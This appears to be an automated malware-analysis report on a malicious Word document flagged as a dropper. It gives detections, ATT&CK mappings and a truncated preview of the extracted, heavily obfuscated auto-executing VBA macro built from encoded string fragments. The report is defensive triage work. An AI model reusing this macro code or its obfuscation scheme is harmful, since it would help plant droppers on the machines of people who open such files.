MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicated by the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics, to execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6363354-0' further confirms its malicious nature as a dropper. No specific family could be identified.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6363354-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6363354-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41024 bytes |
SHA-256: 88baf80952df27a01d8734d76c2754bab32035cf5c741de8948eca8741e4b17a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 62 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sEjWzsinD"
Function hJGMOKfrD()
TrdEzRI = mpRXQWJc
TLpvC = Mid("4WLfbCHj6SEduPa3Y3jYKjKnjQAxADAAOAB9ADEAMQAxAG4AOQA3AGMAMQAwADAAVQA3ADAAOwAxADAANQBuADEAMAA4ACUAMQAwADEAVQA0ADAAf3kw", 26, 88)
cGGTDQVrt = TLpvC
vcXwChz = sLMpMoPT
CAQOWFqsd = Mid("2PXiNwB7ADEAMQA2AG4AMQAwADQASAAzADIAOwA2ADEAVQAzADIAYwAzADYAfQAxADAAMQB7ADEAMQAwAFUAMQAxADgAfQA1ADgASAAxADEANgB9ADEAMAAxAuqsSc4bHWE5ohz", 5, 117)
LkjXlstSQj = CAQOWFqsd
zqtHIUS = RbfEBaZz
XVNGmkBA = Mid("9J6dQPZG9K97Qp8w3dDaZtSskPlset %WQrNtXdhO%=wers&&setAHu", 28, 25)
RYBipGI = XVNGmkBA
EkjEbrr = wAwTwSsK
lTUAhjoUzQl = Mid("AB3hzO8wMaTjDYUmRavANwBjADQANwB9ADkANwBVADEAMQAyACUAOQA4ACUAMQAwADUAVQNYlLrH6jnhkiMDOH", 20, 51)
QUPFt = lTUAhjoUzQl
EUWWRhX = OBIdLvRz
tNJdjqz = Mid("tlTftRdi6UHiMAMgA7ADMAOQB9ADQANgBVADEAMAAxACYAMQAyADAAfQAxADAAMQBVADMAOQBVADUAOQAmADEAMAAyAHsAMQAxADEAfQAxADEANAA7ADEAMAAxvTVBkv7mo", 14, 109)
qGsYhBwtW = tNJdjqz
fZSMHEf = jncIttLo
YPMJo = Mid("06AewA0AOWLb0YQQOE", 3, 6)
VDSLZBWIzhn = YPMJo
VAYRaji = EHShWfww
vamVtj = Mid("sYMSndTlBRGHQBcjFYK4kMQAxADYAewAzADIAfgAxADEANABVADkANwBjADEAMQAwAHsAMQAwADAAOwAxADEAMQB9ADEAMAA5ADRoV1othFzl", 22, 78)
bwGrwFHb = vamVtj
fwfCQuf = FlFZlitJ
DQpbWPbp = Mid("RuCm19AxADAANQB+ADEAMQAwAH0AMQAwADMAfgA0ADAAOwA0ADEAVQA0ADQAfQAzADIAVQAzADYAewAxADEAMgAmADkANwB+ADEAMQA2AH4AMQAwADQAfQA0ADEAbgA1ADkAbgA4ADMAfgAxADEANgBVADkANwB+ADEAMQA0AGMAMQAxADYAJgA0ADUAJgA4ADASNwrJU2zKbAS", 7, 189)
ntEZVSo = DQpbWPbp
niCMmcm = iqOAVKua
jUmrVdmzJ = Mid("Pq0BH3GDAOQB9ADkAOAA7ADEAMAA2AEgAMQAwADEAfQA5ADkAbgAxADEANgB9ADMAMgBIADgANwAlADgAMwB+ADkAOQBuADEAMQA0AH0AMQAwADUAbgAxADEAMgBVADEAMQA2AG4ANAA2AG4AOAAzAFUAMQAwADQAVQAxADAAMQAmADEAMAA4AG4Qs6", 9, 176)
dmjivZUSV = jUmrVdmzJ
iznpwLO = quupunMB
sStwqsFjJIw = Mid("8Fz641nsocNwKwtjuADEAMQAyAFUANQA4AH4ANAA3AFUANAA3AEgAMQAwADkASAA5ADcAfQA5ADcAfgAxADEANABIADEAMQA2ACUAMQAwADYASAAxADAAMQB7ADEAMAAyAHsAMQAxADEAbgAxADAAOAA7ADEAMAA3ADsAMQAwADEASAAxADEANABVADEAMAA1AEgAMQAxADAAfQAxADAONGYpv", 17, 196)
aanLdqiB = sStwqsFjJIw
wwKwiDT = TJWtSooP
CIjWNC = Mid("iE9jQAzADYAewAxADEAMAA7ADkANwB7ADEAMAA5AGMAMQAwADEAfgAzADIAfQA2ADEAewAzADIAfgAzADYlMPUKzn", 5, 78)
naXiI = CIjWNC
ZULKXZz = twzZnHRw
bSjXW = Mid("Y09i6hH4Vjq1Ua4LDEAJQA1ADkAfQAzADYAfgAxADEAMgBVADkAOlaA7", 17, 35)
izHwPOvwZQd = bSjXW
hzSpPEK = MPXOjdTD
IiMGofqPl = Mid("3Lc2lM7wDiGqF4Xzzt9cjw8DRAFUAOQA3ACUAOQA5AHsAMQAwADQAJgA0ADAAewAzADYAJQAxADEANwB9ADEAMQA0ACUAMQAwADgAfgAzADIAfgAxADAANQAmADEAMQAwACUAMwAyAFUAMwA2AFUAMQAxADcAfQAxADEANAA7ADEAMAA4AH4AMQAxADUAOwA0ADEACVBFwBqK", 26, 172)
RwWXoPVMHlu = IiMGofqPl
tZBfVVj = cocACOAF
jaiaESlivnm = Mid("4jBO25iownT8mABvAFMAVAByAEkAbgBnACgAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoATwBJAG4AJwAnACkAIAAoACAALQBKAG8ASQBuACgAIAAnADMANgBuADEAMQA5AH0AMQAxADUAVQA5ADkASAAxALZjBhDGV", 14, 140)
ZBTkOW = jaiaESlivnm
PMBMouA = zYKOIvnI
GXrrvMOPcZw = Mid("pthBiS19I8zoFm9953694VdZ6ojpPU6KABoA0ADQAfQAzADIAVQA1ADQAYwA1ADMAVQA1ADMAbgA1ADEAewA1ADQBC", 36, 53)
JCIfMQrBfMY = GXrrvMOPcZw
sUatEzm = cwbwWdMP
AYlXf = Mid("XLA08G6zNwA2AEgAMQAxADEAOwAxADAAMgAlADEAMQAzAH0AMQAwADEAfQA2ADUAfgAppVQ18K6j47tiT", 9, 59)
dNEMWuqjXEi = AYlXf
BwMKHCf = QiItZcUG
PjATV = Mid("66IsZtG3ADUAVQAxADAAMgB9ADQANwBuADQANAB9ADEAMAA0ADsAMQAxADYAYwAxADEANgA7ADEAMQAyACUANQA4AG4FCmwwPbqTGUM0uNDdmcqDCNJbHlX", 8, 84)
QcswsZc = PjATV
Mnpjjjc = UwFdjElq
lXsbJ = Mid("JnGMbLjGj05hkAEi5FSzaGG4wOajj5CYAMQAxADYAfgAxADEAMgAmADUAOABVADQANwAmADQANwB7ADQAOABuADUANQB9ADQANgBVADEAMQA1ADsAMQAwADcAbgA0ADcAVQA3ADIAfQA0ADcAYwA0ADQAfQAxADAANAAlADEAMQA2AFUAMQAxADYAOwAxADEAMgBjADUAOAAlADQL5", 31, 178)
WHtCnjiHQr = lXsbJ
YXmJISv = kfFNDvkK
zSzFzQNcizz = Mid("5EHHr26plAMQAxADEAYwAxADEAMABVADEAMQA1AFUANAA1ACUAOQA5AFUAMQAxADEASAAxADEAMwB9ADEAMQA3AG4AMQAwADUAOwAxADEAMABIADEAMAAxAFUAMQAxADUAfgA0ADYAVQAxADAAMgBjADEAMQvUsPIqM", 10, 147)
JaVPmChXhoH = zSzFzQNcizz
aJI
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.